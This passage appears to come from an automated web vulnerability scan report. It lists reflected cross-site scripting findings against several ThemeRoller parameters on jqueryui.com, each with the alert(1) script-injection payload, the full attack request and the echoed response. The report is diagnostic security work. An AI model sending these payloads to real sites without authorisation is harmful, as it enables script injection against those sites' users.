bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=03a86e"><script>alert(1)</script>86153e925ae&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.18. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2c"><script>alert(1)</script>14d61402d9b was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=06bd2c"><script>alert(1)</script>14d61402d9b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
03e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=06bd2c"><script>alert(1)</script>14d61402d9b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.19. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3404"><script>alert(1)</script>60ea8a71583 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb3404"><script>alert(1)</script>60ea8a71583&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
conColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb3404"><script>alert(1)</script>60ea8a71583&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighl
...[SNIP]...

1.20. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a515b"><script>alert(1)</script>de3e563a943 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.pnga515b"><script>alert(1)</script>de3e563a943&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
us=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.pnga515b"><script>alert(1)</script>de3e563a943&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=5
...[SNIP]...

1.21. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a0b"><script>alert(1)</script>4f33de6bd13 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngd2a0b"><script>alert(1)</script>4f33de6bd13&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngd2a0b"><script>alert(1)</script>4f33de6bd13&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&icon
...[SNIP]...

1.22. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc88"><script>alert(1)</script>26ccc18bbb was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.pngcfc88"><script>alert(1)</script>26ccc18bbb&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120031

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.pngcfc88"><script>alert(1)</script>26ccc18bbb&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextu
...[SNIP]...

1.23. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc6ff"><script>alert(1)</script>7761c2c16e6 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.pngcc6ff"><script>alert(1)</script>7761c2c16e6&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.pngcc6ff"><script>alert(1)</script>7761c2c16e6&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101
...[SNIP]...

1.24. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92262"><script>alert(1)</script>3bf54c79764 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png92262"><script>alert(1)</script>3bf54c79764&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png92262"><script>alert(1)</script>3bf54c79764&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a12
...[SNIP]...

1.25. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97f7"><script>alert(1)</script>27d3858697 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnga97f7"><script>alert(1)</script>27d3858697&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120031

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ntent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnga97f7"><script>alert(1)</script>27d3858697&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconCol
...[SNIP]...

1.26. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f48c"><script>alert(1)</script>be4bd7ca47a was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png5f48c"><script>alert(1)</script>be4bd7ca47a&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png5f48c"><script>alert(1)</script>be4bd7ca47a&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.27. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d8aa"><script>alert(1)</script>a079cdcb31f was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

